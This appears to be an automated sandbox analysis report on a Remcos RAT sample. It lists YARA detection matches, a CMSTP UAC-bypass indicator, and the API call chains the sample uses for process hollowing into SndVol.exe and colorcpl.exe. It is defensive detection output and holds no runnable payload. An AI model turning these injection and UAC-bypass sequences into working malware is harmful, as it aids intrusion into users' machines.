Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Windows\SysWOW64\SndVol.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0291C7B8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0291C7B8
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0291A4DC GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadHugeReadPtr,IsBadHugeReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle,	0_2_0291A4DC
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917A74 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	0_2_02917A74
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917924 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_02917924
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_02917CA8
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02918170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	0_2_02918170
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0291816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	0_2_0291816E
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0291C6D2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0291C6D2
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0291C6D4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0291C6D4
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917A72 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	0_2_02917A72
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029179B8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,	0_2_029179B8
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917922 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_02917922
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	3_2_004180EF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	3_2_004132D2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,	3_2_0041BB09
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,	3_2_0041BB35
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536C7D6 OpenProcess,NtSuspendProcess,CloseHandle,	3_2_0536C7D6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536E25C NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	3_2_0536E25C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05368DBC CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	3_2_05368DBC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05363F9F OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	3_2_05363F9F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536C802 OpenProcess,NtResumeProcess,CloseHandle,	3_2_0536C802
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	4_2_0040DD85
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00401806 NtdllDefWindowProc_W,	4_2_00401806
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_004018C0 NtdllDefWindowProc_W,	4_2_004018C0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_004016FD NtdllDefWindowProc_A,	7_2_004016FD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_004017B7 NtdllDefWindowProc_A,	7_2_004017B7

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_02918170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,

0_2_02918170

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		3_2_004167B4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05367481 ExitWindowsEx,LoadLibraryA,GetProcAddress,		3_2_05367481

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029020C4	0_2_029020C4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0043E0CC	3_2_0043E0CC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041F0FA	3_2_0041F0FA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00454159	3_2_00454159
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00438168	3_2_00438168
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004461F0	3_2_004461F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0043E2FB	3_2_0043E2FB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0045332B	3_2_0045332B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0042739D	3_2_0042739D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004374E6	3_2_004374E6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0043E558	3_2_0043E558
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00438770	3_2_00438770
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004378FE	3_2_004378FE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00433946	3_2_00433946
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0044D9C9	3_2_0044D9C9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00427A46	3_2_00427A46
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041DB62	3_2_0041DB62
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00427BAF	3_2_00427BAF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00437D33	3_2_00437D33
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00435E5E	3_2_00435E5E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00426E0E	3_2_00426E0E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0043DE9D	3_2_0043DE9D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00413FCA	3_2_00413FCA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00436FEA	3_2_00436FEA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535114A	3_2_0535114A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053885CB	3_2_053885CB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0538943D	3_2_0538943D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05378713	3_2_05378713
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05384613	3_2_05384613
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0539E696	3_2_0539E696
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053881B3	3_2_053881B3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0537806A	3_2_0537806A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0538F225	3_2_0538F225
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0538ED99	3_2_0538ED99
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536FDC7	3_2_0536FDC7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05387CB7	3_2_05387CB7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05364C97	3_2_05364C97
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053A3FF8	3_2_053A3FF8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0538EFC8	3_2_0538EFC8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05388E35	3_2_05388E35
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053A4E26	3_2_053A4E26
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05396EBD	3_2_05396EBD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536E82F	3_2_0536E82F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0537887C	3_2_0537887C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05386B2B	3_2_05386B2B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0538EB6A	3_2_0538EB6A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05388A00	3_2_05388A00
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05377ADB	3_2_05377ADB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6CB5C1	3_2_1E6CB5C1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6D7194	3_2_1E6D7194
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044B040	4_2_0044B040
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0043610D	4_2_0043610D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00447310	4_2_00447310
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044A490	4_2_0044A490
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0040755A	4_2_0040755A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0043C560	4_2_0043C560
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044B610	4_2_0044B610
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044D6C0	4_2_0044D6C0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_004476F0	4_2_004476F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044B870	4_2_0044B870
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044081D	4_2_0044081D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00414957	4_2_00414957
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_004079EE	4_2_004079EE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00407AEB	4_2_00407AEB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044AA80	4_2_0044AA80
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00412AA9	4_2_00412AA9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00404B74	4_2_00404B74
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00404B03	4_2_00404B03
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0044BBD8	4_2_0044BBD8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00404BE5	4_2_00404BE5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00404C76	4_2_00404C76
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00415CFE	4_2_00415CFE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00416D72	4_2_00416D72
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00446D30	4_2_00446D30
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00446D8B	4_2_00446D8B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_00406E8F	4_2_00406E8F
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00405038	7_2_00405038
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0041208C	7_2_0041208C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_004050A9	7_2_004050A9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0040511A	7_2_0040511A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0043C13A	7_2_0043C13A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_004051AB	7_2_004051AB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00449300	7_2_00449300
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0040D322	7_2_0040D322
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0044A4F0	7_2_0044A4F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0043A5AB	7_2_0043A5AB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00413631	7_2_00413631
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00446690	7_2_00446690
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0044A730	7_2_0044A730
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_004398D8	7_2_004398D8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_004498E0	7_2_004498E0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0044A886	7_2_0044A886
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0043DA09	7_2_0043DA09
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00438D5E	7_2_00438D5E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00449ED0	7_2_00449ED0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_0041FE83	7_2_0041FE83
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00430F54	7_2_00430F54

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 0538543D appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 05352B32 appears 35 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 05385ADD appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: String function: 029046A4 appears 244 times
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: String function: 0290480C appears 771 times
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: String function: 029044AC appears 69 times
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: String function: 02917DF4 appears 45 times
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: String function: 02917CA8 appears 49 times

Source: HGTQP09643009.scr.exe, 00000000.00000002.2033128865.000000007FCE9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs HGTQP09643009.scr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2003278216.00000000022E2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs HGTQP09643009.scr.exe

Source: HGTQP09643009.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
